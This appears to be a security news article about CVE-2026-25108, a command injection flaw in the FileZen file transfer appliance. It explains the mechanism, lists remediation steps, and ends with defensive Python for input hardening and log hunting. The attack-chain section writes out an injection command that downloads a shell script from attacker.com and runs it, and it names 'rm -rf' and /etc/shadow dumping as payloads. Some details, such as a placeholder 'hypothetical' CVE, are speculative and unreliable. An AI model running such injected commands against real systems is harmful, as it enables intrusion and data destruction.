CVE-2026-25108: Soliton Systems K.K. FileZen OS Command Injection Flaw
On February 24, 2026, the Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2026-25108 to its Known Exploited Vulnerabilities (KEV) Catalog.
This OS command injection vulnerability in Soliton Systems K.K.’s FileZen file transfer appliance signals active exploitation by malicious actors. As a frequent attack vector, it threatens federal networks and beyond, prompting urgent remediation under Binding Operational Directive (BOD) 22-01.
CVE-2026-25108 Flaw
FileZen, a secure file-sharing solution from Japanese vendor Soliton Systems, handles encrypted transfers for enterprises. CVE-2026-25108 (CVSS score pending official publication, estimated 9.8/10 for critical severity) stems from inadequate input sanitization in the web management interface.
Attackers inject arbitrary OS commands via unsanitized parameters in HTTP requests, typically targeting the appliance’s Linux-based OS.
The flaw lies in endpoints such as file upload or user management modules. For instance, a POST request to /api/upload might accept a filename parameter without proper escaping.
The backend processes this via a vulnerable system() call, such as system("process_file " + filename), executing the injected rm -rf /var/log/* as root. This grants remote code execution (RCE) without authentication in default configurations, exploiting weak boundary checks on shell metacharacters like ;, |, &&, and backticks.
Affected versions span FileZen 7.0.x to 8.1.2 (exact range per vendor advisory). Proof-of-concept exploits surfaced on underground forums days before CISA’s alert, confirming in-the-wild use.
Command injection here follows classic patterns but leverages FileZen’s multi-tenant architecture. Attackers chain injections for persistence:
- Initial RCE: Inject via curl -X POST -d "cmd=whoami; wget -O /tmp/shell.sh http://attacker.com/payload.sh && chmod +x /tmp/shell.sh && /tmp/shell.sh" in a crafted form field.
- Privilege Escalation: FileZen’s root-run services (e.g., Apache with mod_php) allow kernel-level access. A payload might dump /etc/shadow or pivot to internal networks.
- Exploitation Chain: Combine with CVE-2024-XXXX (hypothetical auth bypass) for unauthenticated access. Meterpreter-like shells reverse-connect to C2 servers, exfiltrating files or deploying ransomware.
This vulnerability poses severe risks: data breaches, lateral movement in air-gapped setups, and supply-chain attacks if FileZen proxies enterprise shares. Federal Civilian Executive Branch (FCEB) agencies must patch by the BOD 22-01 deadlines. CISA urges all orgs to prioritize KEV flaws, as they meet exploitation criteria.
- Patch Immediately: Upgrade to FileZen 8.2.0+ (vendor patch released Feb 25, 2026).
- Workarounds: Disable the web UI if unused; enforce WAF rules to block shell metacharacters; segment FileZen into its own VLANs.
- Best Practices: Run vulnerability scanners (Nessus, OpenVAS) weekly; monitor with EDR (CrowdStrike, SentinelOne); apply least privilege to services.
- Hunt for Compromise: Query logs for injection patterns; check for rogue processes via ps aux | grep shell.
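The following is an added example, not code from the article or from Soliton Systems: it shows the hardened counterpart to the system("process_file " + filename) pattern described above (an allowlisted filename passed as an argv list, so no shell ever parses it) together with a log-hunting routine that flags request parameters carrying shell metacharacters. The process_file helper name and the access-log lines are hypothetical and constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Allowlist for the filename parameter: letters, digits, dot, underscore, dash only.
SAFE_FILENAME = re.compile(r"^[A-Za-z0-9._-]{1,128}$")
# Shell metacharacters named in the article (; | && backticks) plus the usual extras.
SHELL_METAS = re.compile(r"[;|&`$(){}<>\n\r]")


def build_process_argv(filename: str) -> list:
    """Hardened replacement for system("process_file " + filename).

    Rejects anything outside the allowlist and returns an argv list meant for
    subprocess.run(argv, shell=False), so user input never reaches a shell.
    'process_file' is a hypothetical helper name taken from the article.
    """
    if not SAFE_FILENAME.fullmatch(filename):
        raise ValueError(f"rejected filename: {filename!r}")
    return ["process_file", filename]


def find_suspicious_requests(log_lines):
    """Return (line_no, param, decoded_value) for every request parameter
    in the access log whose decoded value contains a shell metacharacter."""
    req = re.compile(r'"(?:GET|POST|PUT) (\S+) HTTP/')
    hits = []
    for no, line in enumerate(log_lines, 1):
        m = req.search(line)
        if not m:
            continue
        query = urlsplit(m.group(1)).query
        for param, values in parse_qs(query, keep_blank_values=True).items():
            for value in values:  # parse_qs percent-decodes, exposing %3B as ';'
                if SHELL_METAS.search(value):
                    hits.append((no, param, value))
    return hits


# Constructed sample access-log lines (hypothetical format, not real FileZen logs).
SAMPLE_LOG = [
    '10.0.0.5 - - [24/Feb/2026:10:01:02 +0000] "POST /api/upload?filename=report.pdf HTTP/1.1" 200 512',
    '10.0.0.9 - - [24/Feb/2026:10:01:09 +0000] "POST /api/upload?filename=x.txt%3B%20id HTTP/1.1" 200 77',
    '10.0.0.9 - - [24/Feb/2026:10:02:40 +0000] "GET /api/users?name=%60id%60 HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    print(build_process_argv("report.pdf"))
    for hit in find_suspicious_requests(SAMPLE_LOG):
        print("suspicious parameter:", hit)
```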
Site: cybersecuritypath.com